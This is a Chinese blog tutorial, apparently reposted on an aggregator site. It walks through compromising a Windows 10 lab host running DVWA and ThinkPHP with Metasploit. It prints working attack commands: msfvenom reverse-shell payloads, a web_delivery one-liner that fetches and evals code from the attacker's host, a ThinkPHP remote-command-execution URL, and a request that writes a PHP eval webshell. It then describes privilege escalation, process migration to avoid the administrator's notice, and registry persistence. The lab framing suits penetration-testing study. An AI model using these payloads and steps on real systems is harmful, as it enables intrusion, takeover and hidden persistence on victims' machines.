msf攻击windows实例

news2024/10/6 6:42:15

环境:攻击机kali(192.168.129.139),目标机windows10(192.168.129.132)

方法一:通过web站点,使用无文件的方式攻击利用执行(命令执行漏洞)

方法二:通过web站点,上传webshel,返回给msf(msfvenom)

方法三:攻击其他端口服务,拿到meterpreter(445)

一、Nmap端口收集

nmap -sV -T4  192.168.129.132(扫描的可能比较慢,两个字:等待)

这里以80作为突破口(漏洞最多的就是它,先打它)

方式一、访问web站点,寻找可能点(这里我使用小皮面板搭建的dvwa靶场)

dirsearch  御剑  爆破目录

命令执行就是进行一个拼接

Vulnerability: Command Injection :: Damn Vulnerable Web Application (DVWA)

​​​​​​http://192.168.129.132/dvwa/vulnerabilities/exec/

注意安全等级改为low

127.0.0.1(ping自己)

使用&&拼接命令

此处有命令执行的权限了,就可以使用msf

利用命令执行漏洞,结合上一章的知识,我们可以怎么做?    

msfvenom生成payload

①python :

msfvenom  -p python/meterpreter/reverge_tcp LHOST=<Your IP 'Address> LPORT=<Your Port to

Connect On> -f raw >shell.py

②bash :

msfvenom -p cmd/unix/reverse_bash LHOST=<Your, IP Addreas>LPORT=<Youx, Port to

Connect On> -f raw>shell.sh

③pexl :

msfvenom -p cmd/unix/reverse_perl LHOST=<Your,IP Address>LPORT=くYour Port to Connect

0n> -f raw>shell.pl

1、当攻击者拥有部分受害者主机的控制权,但还没有拿到一个完整的shell时,web_delivery就派

上用场。

2、web delivery的主要目的是快速和受害者主机建立一条session。当受害者主机存在比如命令注

入、远程命令执行等问题时,攻击者可以使用web delivery生成的一条命令建立连接。

3、另外web delivery的payload不会在受害者主机磁盘上写文件,而是直接将攻击者服务器上的代

码加载到内存执行,有利于绕过检测。

4、web delivery支持php/python/powershell等多种脚本,使用不同的脚本的payload时需要通过set

target或2来设置是使用php还是python还是powershell等。

因为判断出是php的,所以可以做如下操作:

①use exploit/multi/script/web_delivery   //使用模块

②show options  //显示可设置参数

③set  lhost  指定目标ip   

show targets  //查看设置(php,python等等)

set  target  编号

show options 再次查看配置

④set  lport  指定端口

⑤run 执行

会生成一段代码,把代码复制,在上述开始时的127.0.0.1&&的位置处粘贴运行

此时还没有完成,因为没有配置php的环境变量(注意:对全部的用户进行配置(方式一))

干掉正占用的jobs

重新run执行

复制出生成的python代码(注意:要在一行)

同理方式进行运行

此时目的达成,拿到了meterpreter

操作步骤:

前提:测试拥有命令执行权限

①进入kali linux  启动msf

msfconsole

注意:如果启动不成功就多次启动尝试一下

search  web_delivery 

use  编号/需要的模块命令(这里我使用第一种)     use  1

show options  查看可以指定的payload

set payload php/meterpreter/reverse_tcp

set  lhost ip目标

set lport  端口

没有指定target

show targets 查看要指定的target

set target 1

show  options  查看

run 执行

进入客户端网站页面:执行

部分1:127.0.0.1&&

php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.129.132:8080/ncu6AXlH', false, stream_context_create(['ssl'=>['verify_peer'=>  部分2

分为以上两个部分

这里的攻击机没有收到任何回显:原因:因为这里搭建是使用的phpstudy,没有配置php的环境变

量,如果和java一样配置了环境变量的话(JDK) 。有兴趣自己去试试吧

我的位置在:C:\phpStudy\PHPTutorial\php(看你安装位置了)

注意:对全部的用户进行配置

尝试使用命令行执行,结果如下:

这里有python,我们切换python尝试

set target 0

注意:payload改回python

set payload python/meterpreter/reverse_tcp

run执行

注意:复制出来要一行(可以使用notepad++)

使用back命令是返回上一级  background后台执行

客户端运行(同理上)

jobs查看已经运行的,kill 编号 杀死在运行的   

我这边显示服务器拒绝连接:(暂未解决,可能是版本的问题,后续补上)

成功后应如下图所示:

sessions查看

session 2进入meterpreter

所有的杀毒软件都会栏powershell(远程执行时)一刀切(执行过程类似)和拔网线一样

方式二、访问web站点,寻找可能点(上传webshell)

示例:

dirsearch扫描

dirsearch可能kali中没有需要自己安装

方式一、apt-get安装

简单(命令:apt-get  install dirsearch)

①一般用法:

dirsearch  -u  url -e*

方式二、clone克隆方式

git clone https://github.com/maurosoria/dirsearch.git

然后在家目录进入dirsearch

cd dirsearch

然后再使用命令:

python3 dirsearch.py -u http://159.75.16.25 -e*    (-e*扫描所有文件)(此处只展示使用方法,不

是针对此案例的扫描)

本示例开始:

此版本php存在远程命令执行漏洞

上述帮助我们getshell

可以由此利用python和上传webshell进行攻击(前面已经有python例子了此处我们使用上传)

meterpreter功能很少,要提权,可能被IDS拦截,后渗透,可以使用免杀马和不死马进行上传。

这里我们上传(phpinfo,shell.php)

执行如下:

无报错

查看靶机(上传成功)

可以进行连接

适用webshell进行连接

蚁剑,冰蝎,哥斯拉,菜刀等工具

此处使用蚁剑(有时候使用这些工具时可能有莫名其妙的错误,不行就换工具)

此时拿到webshell了但它的权限很低,要拿到meterpreter

windows系统我们就有了上传权限,linux操作系统,我们就可以把木马上传到tmp目录下(因为

tmp目录下可读可写可执行)这是思露

马是msfvenom马,上去执行,拿到meterpreter(很清晰吧)

①use exploit/multi/handler

②show options

③set payload windows/meterpreter_reverse_tcp

④set  lhost   set   lport

⑤run   进行监听(这边监听者)

复制此段:windows/meterpreter_reverse_tcp

msfvenom -p windows/x64/meterpreter/reverse_tcp  lhost=192.168.129.139  lport=9999  -f exe -o  test.exe

这边会生成test.exe,把它上传到(连接上webshell的机器),肯定会查杀(设置好后,来到蚁

剑,根据webshell上传test.exe文件)

查看权限:

是有可执行权限的(右击,在此处打开终端)

此时kali中已经进入到了meterpreter

此时就可以去做一些事情了

①getuid

②getsystem   简单提权(使用注册表进行一个管道)原理自己去了解一下吧

注意:如果你是网站管理员,你发现网站很卡,很可能有别人种的病毒(查任务管理器,找到

test.exe,结束了此进程,那你就没得玩了)

这边直接断了,那不行,有什么办法,作伪装(加壳,免杀)如何伪装?

查看进程id,进行进程迁移,搞成正常进程

环境想让他再次跑起来:如上操作,run(kali)  ,stat  test.exe(蚁剑机),等待kali机回复

①getpid

②ps 查看哪些进程在运行

高权限可以往低权限迁移,反过来不行

③getsystem  迁移到最高权限system

④进行迁移(这里是最高权限之后迁)

⑤migrate  迁移id(自己想迁移的,觉得不会被容易发现的)

此服务就将上传的木马文件迁移到了phpstudy中

分布式操作系统可以一对二(自己去看原理)

phpstudy没有断

此时就找不到test.exe了

这就是进程迁移

植入后门一般是植入到注册表里边

上述方式2我们是迁移到phpstydy,它是有文件的,而方式1是没有没文件的(内存中运行)管理员

关掉就没了。再重启木马就被杀掉了(方式2有后门)怕后门查杀的话,查杀注册表(更容易被查

杀,不推荐)注册表了写一个东西,以此开机运行

实验:暂未做

thinkphp5.1.29下载链接:https://pan.baidu.com/s/1b1l1HD0EP6c4uqtlSYokng 

提取码:burp

直接解压放大小皮面板的www目录下,添加站点配置如下,php版本注意

页面显示:

测试漏洞:http://192.168.129.132/thinkphp/html/public/index.php?

s=/index/\think\request/cache&key=whoami|system

上马:

http://192.168.129.132/thinkphp/html/public/index.php?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20eval($_POST[c]);?%3E

执行结果如下:

查看靶机:上传成功(真实场景是看不到的哈)/html/public

此时可以使用shell.php去连接webshell(注意这里暂时先不使用代理)

双击,成功连接(webshell工具成功上线)

连过之后,此时就可以上传木马(拿到webshell后,拿到meterpreter)拿到webshell windows系统

有上传权限,执行权限。

上传msfvenom生成的马

注意这里的lhost是攻击机ip,lport要一致(今天先到这里)

这里一直连接不上(防火墙,有效负载,监听设置,网络访问和路由,反病毒软件都检查了,没排

出来)

后期再补

多次尝试

一、Nmap端口收集

方式一、访问web站点,寻找可能点(这里我使用小皮面板搭建的dvwa靶场)

操作步骤:

方式二、访问web站点,寻找可能点(上传webshell)

本示例开始:


本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1718563.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Android 开机动画的启动过程BootAnimation(基于Android10.0.0-r41)

文章目录 Android 开机动画的启动过程BootAnimation(基于Android10.0.0-r41)1.开机动画的启动过程概述2.为什么设置了属性之后就会播放&#xff1f; Android 开机动画的启动过程BootAnimation(基于Android10.0.0-r41) 1.开机动画的启动过程概述 下面就是BootAnimation的重要部…

香橙派开发板测评:探索创新的嵌入式解决方案

嵌入式系统在当今科技领域中扮演着越来越重要的角色&#xff0c;而开发板作为嵌入式系统设计的核心工具&#xff0c;不断推动着创新的边界。在众多开发板中&#xff0c;香橙派&#xff08;Orange Pi&#xff09;系列以其出色的性能和丰富的接口&#xff0c;备受开发者的青睐。本…

xss漏洞学习(题解)

1.简单知识点回顾 XSS允许恶意web用户将代码植入到提供给其它用户使用的页面中。 特点&#xff1a;能注入恶意的HTML/JavaScript代码到用户浏览器网址上&#xff0c;从而劫持会话 类型&#xff1a; DOM型&#xff1a;属于反射型的一种&#xff0c;利用非法输入来闭合对应的h…

动态代理的代码实现

目录 准备工作 正式书写 测试 准备工作 定义一个BigStar类&#xff1a; 定义Star接口&#xff0c;在这里面定义一些想要被代理的方法。 让BigStart实现Star接口&#xff1a; 正式书写 新建ProxyUtil类&#xff0c;这个类的作用就是创建一个代理&#xff0c;里面有createPro…

WebGoat靶场搭建

WebGoat靶场介绍 WebGoat是一个由OWASP&#xff08;Open Web Application Security Project&#xff09;组织开发的应用平台&#xff0c;专门用于进行Web应用程序安全漏洞的实验。它旨在通过模拟各种安全漏洞&#xff0c;帮助用户了解和学习如何识别和防御这些漏洞。WebGoat基…

排序算法(一) 基础排序算法

排序算法 基础排序算法 排序本质&#xff1a;减小逆序对的过程 在基础排序算法中&#xff0c;将待排序序列分为相对有序区与相对无序区。 每次遍历到数组末尾称为一轮。 冒泡排序(无序区-有序区, O ( n 2 ) O(n^2) O(n2),稳定,就地) 在每一轮中&#xff0c;逐次与下一邻项…

在长窗口时代,RAG技术是否仍然必要?

自从谷歌推出 Gemini 1.5 Pro&#xff0c;行业内部对于 RAG 的讨论就不绝于耳。 Gemini 1.5 Pro 的性能确实令人瞩目。根据谷歌公布的技术文档&#xff0c;该系统能够稳定处理长达 100 token 的内容&#xff0c;相当于一小时的视频、十一小时的音频、超过三万行的代码或七十万…

服务器的初始化

服务器的初始化 新的服务器到手&#xff0c;部署服务器的初始化。 1、配置ip地址 网关 dns解析&#xff08;static&#xff09;内网和外网 2、安装源&#xff0c;外网&#xff08;在线即可&#xff09;内网&#xff08;只能用源码包编译安装&#xff09; 3、磁盘分区&#…

2024年第一期“数据安全咨询(高级)”培训开启报名!

各有关单位 为加速数据安全专业人才的培育&#xff0c;增强企事业单位数据安全治理与防御能力&#xff0c;提升数据安全从业人员的业务能力和管理水平&#xff0c;在中国电子学会、杭州市计算机学会、浙江省网安协数据安全治理专委会的支持下&#xff0c;浙江省电子学会、杭州…

【Qt】Qt界面美化指南:深入理解QSS样式表的应用与实践

文章目录 前言&#xff1a;1. 背景介绍2. 基本语法3. QSS 设置方式3.1. 设置全局样式3.2. 从文件加载样式表3.3. 使用 Qt Designer 编辑样式 总结&#xff1a; 前言&#xff1a; 在当今这个视觉至上的时代&#xff0c;用户界面&#xff08;UI&#xff09;的设计对于任何软件产…

apexcharts数据可视化之圆环柱状图

apexcharts数据可视化之圆环柱状图 有完整配套的Python后端代码。 本教程主要会介绍如下图形绘制方式&#xff1a; 基础圆环柱状图多组数据圆环柱状图图片背景自定义角度渐变半个圆环图虚线圆环图 基础圆环图 import ApexChart from react-apexcharts;export function Cir…

效率管理时间应用:滴答清单

一、简介 1、滴答清单&#xff08;TickTick&#xff09;&#xff0c;一款由杭州随笔记网络技术有限公司开发的待办事项和任务提醒工具&#xff0c;作为TickTick的中国服务器版本&#xff0c;它提供了易用、轻量、功能完整的解决方案&#xff0c;支持Web、iOS、Android等多个平…

【大比武10】行业垂直大模型应用在档案管理中的探索

关注我们 - 数字罗塞塔计划 - # 大比武2024 本篇是参加“华夏伟业”杯第二届档案信息化公司业务与技术实力大比武&#xff08;简称“大比武 2024”&#xff09;的投稿文章&#xff0c;来自广州龙建达电子股份有限公司&#xff0c;作者&#xff1a;陶宣任。 在这个人工智能技…

学习笔记:(2)荔枝派Nano开机显示log(全志F1C200S)

学习笔记:TF卡启动荔枝派Nano(全志F1C200S) 1.u-boot配置2.需要配置LCD的显示设备树1.u-boot配置 ARM architecture Enable graphical uboot console on HDMI, LCD or VGAx:480,y:272,depth:

李廉洋:5.31黄金原油末日砸盘,美盘分析及策略。

黄金消息面分析&#xff1a;过去几天股市的抛售也是金属市场的利多因素。美国商务部将第一季度GDP预期从1.6%下修至1.3%后&#xff0c;美国国债收益率下降。同时&#xff0c;美国劳工部公布&#xff0c;上周首次申请失业救济人数从前一周修正后的21.6万人上升至21.9万人。综合来…

python3.5如何安装numpy

python3.5如何安装numpy&#xff1f;步骤如下&#xff1a; 1.首先应该将你的Python环境变量设置正确。检验是否正确的方法就是winR&#xff0c;输入cmd 。在窗口中输入python&#xff0c;应该得到如下所示的效果图&#xff1a; 可以在命令框中直接编译python。 2.安装pip&…

【农村电商1004】 电子商务进农村示范县名单:全面数据集等你探索!

今天给大家分享的发表在国内顶级期刊金融研究的2023年论文《农村发展电子商务能减缓资本与劳动力要素外流吗&#xff1f;——以电子商务进农村综合示范案例为例》使用到的重要数据集电子商务进农村综合示范政策县数据&#xff0c;该论文采用了双重差分法和全国县域面板数据研究…

MySQL:MySQL执行一条SQL查询语句的执行过程

当多个客户端同时连接到MySQL,用SQL语句去增删改查数据,针对查询场景,MySQL要保证尽可能快地返回客户端结果。 了解了这些需求场景,我们可能会对MySQL进行如下设计: 其中,连接器管理客户端的连接,负责管理连接、认证鉴权等;查询缓存则是为了加速查询,命中则直接返回结…

[代码复现]Self-Attentive Sequential Recommendation

参考代码&#xff1a;SASRec.pytorch 可参考资料&#xff1a;SASRec代码解析 前言&#xff1a;文中有疑问的地方用?表示了。可以通过ctrlF搜索’?。 环境 conda create -n SASRec python3.9 pip install torch torchvision因为我是mac运行的&#xff0c;所以device是mps 下面…

谁是镰刀谁是韭菜?程序交易与手动交易的博弈,靠技术还是靠运气

备受争议的话题&#xff0c;很多人认为程序化交易是在破坏市场的平衡&#xff0c;大量的程序交易订单可能会造成市场价格的异常波动&#xff0c;尤其是在高频交易未被监管时&#xff0c;程序化交易者占尽优势&#xff0c;来回收割。 而支持程序交易的人认为&#xff0c;市场是…